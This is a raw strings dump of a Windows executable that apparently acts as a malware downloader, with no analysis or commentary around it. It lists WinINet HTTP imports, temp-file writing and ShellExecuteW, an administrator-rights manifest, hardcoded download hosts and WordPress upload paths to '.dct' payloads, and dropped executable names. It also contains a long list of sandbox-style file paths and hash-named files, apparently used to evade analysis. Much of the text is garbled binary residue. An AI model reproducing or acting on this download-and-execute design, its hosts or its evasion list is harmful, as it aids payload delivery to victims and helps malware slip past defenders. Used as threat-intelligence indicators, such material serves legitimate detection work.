L!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
SUV3WVt$
PD$0Sj
t$,SWV
_^3]@[4
VD$,Pt$
\VD$,PW
VWVUhx!@
VCC<t$
tVVVVh!@
t$<t$ t$
D$<PD$
|[3VVVVS
D$(PUS
D$(PUWt$
|$,;Mu
@;rh!@
SUt$(t$@h
VD$DPt$4t$$W
Vt$,SVt$,
UD$HPh
VVVD$PP
tvp_tvo5uvtv
uv7*uv xw)uvRsv]
uvG]tv7tv*uvketv
RtlDecompressBuffer
InternetOpenW
InternetCloseHandle
InternetConnectW
HttpOpenRequestW
HttpSendRequestW
InternetReadFile
WININET.dll
GetModuleHandleW
HeapCreate
HeapAlloc
GetModuleFileNameW
GetTempPathW
CreateFileW
GetFileSize
lstrlenW
ExitProcess
ReadFile
lstrcmpW
WriteFile
CloseHandle
DeleteFileW
SleepEx
LoadLibraryW
GetProcAddress
FreeLibrary
HeapFree
GetCurrentDirectoryW
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
70D0J0o0{000000000
1G1a1u1
11111111
2%2J2Z2j222222
3R333333333+4@4G4^4e4o4444
/ w p - c o n t e n t / u p l o a d s / i m s c r a p i d m a i l e r - s y s t e m / 1 9 0 5 U S d w . d c t
/ i m a g e / 1 9 0 5 U S d w . d c t
k u u k a a r r 0 3 . c o m
v a l s p e t r o l . c o m
g f f o s . e x e
O p e r a 1 0
t e x t / *
a p p l i c a t i o n / *
n t d l l . d l l
r o p e r n s . e x e
C : \ y 9 O R j t n h . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ i n v o i c e . e x e
C : \ 4 c 2 2 9 8 d b c 1 c 1 3 c e 6 9 5 3 d 2 b e 8 5 1 2 e e f 2 5 d 3 d a 5 d 6 3 0 4 8 1 1 7 b 8 8 4 e 1 2 9 4 5 5 9 6 a a 0 2 1
C : \ 5 4 e b 4 e e 8 8 9 7 8 0 f 3 9 9 4 c c 8 2 a 5 0 4 7 b b 0 e 0 7 5 9 1 6 6 d 0 9 0 1 d c c 6 8 5 d 5 6 1 b f f 7 b 3 a 0 5 2 a
C : \ 0 i Y V e u u 6 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ i m p o r t a n t _ d o c u m e n t . e x e
C : \ 3 e d b b 1 2 8 2 0 a 1 e b c 7 c f 4 5 e d f a c 4 d 1 a 5 b c e 6 9 7 d b a b 4 2 5 2 8 3 b 3 3 4 9 0 2 5 f 7 6 3 2 7 c 9 9 d
C : \ c a b 0 8 e b 0 3 0 2 6 e 9 a 2 5 a 8 2 e a 5 9 6 8 b 7 5 e f 8 c b 0 4 d d 3 1 9 3 d 1 9 6 5 9 e b 8 a 5 e 0 3 9 1 e 0 b 4 1 a
C : \ 7 a 9 1 2 c 3 7 b 7 1 1 d a 4 1 5 d 5 d 0 d 0 6 a 1 8 a 7 3 c e 7 9 1 d 6 4 f d 3 b 3 3 e 5 2 5 3 f 3 9 1 d e 0 9 1 1 2 e 7 9 9
C : \ 2 6 2 5 7 9 c a f d c 8 4 3 1 4 e 1 7 a 6 b 1 a 1 2 5 c c a 6 c 8 8 4 c 2 c 5 e 8 6 f 3 1 6 5 c 1 7 f 1 b 9 3 2 d 6 7 f d a 2 b
C : \ 9 o t 5 R W 4 x . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ i m p o r t a n t _ d o c u m e n t . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ g f f o s . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ i n v o i c e . e x e
C : \ U s e r s \ J o e C a g e \ D e s k t o p \ j Q j 9 8 X M 7 A M . e x e
C : \ 1 1 6 8 f 0 1 2 a 1 7 4 4 a 8 2 3 f c 0 e 2 6 0 3 1 f c f 6 2 c 4 e e c 1 8 2 b e d 7 c 0 3 a e d 1 7 c 8 a a b e 9 f f 7 d f 8
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ M y D o c u m e n t s \ e l p m a s . e x e
C : \ U s e r s \ J o h n \ A p p D a t a \ L o c a l \ T e m p \ A l X x P c w c d r l . e x e
C : \ d 9 e e e e 2 1 b e 5 0 c c 7 c d f f 7 2 8 c 7 7 c e f 1 d e 4 2 3 a b 8 2 5 6 f b 1 4 c c 6 a a 8 0 c 3 1 9 a d 1 c 4 0 1 6 3
C : \ b 4 1 7 6 0 d 4 4 6 0 0 6 3 a b e 5 c 7 d 9 6 4 c 7 5 f f d 2 a e a 5 f 2 d 9 0 0 b 5 e f a 7 0 2 a b f 1 e 4 0 d c 4 6 7 c e c
C : \ 0 9 0 3 f 5 c 4 3 c 4 7 2 f 4 b 3 7 2 2 5 7 3 e e d 8 2 3 2 6 8 3 5 8 7 8 9 4 e 8 b 4 b 7 6 6 9 8 8 5 4 c b 9 5 d 1 2 e e 8 3 d
C : \ e 4 d 0 e 8 d 8 1 2 0 9 0 9 7 4 e b a b f f 5 2 e 2 5 2 f 7 4 c 0 a 3 a f 9 1 1 5 b 2 4 1 5 b 3 9 3 8 2 c e d 8 c 8 6 e 2 4 8 b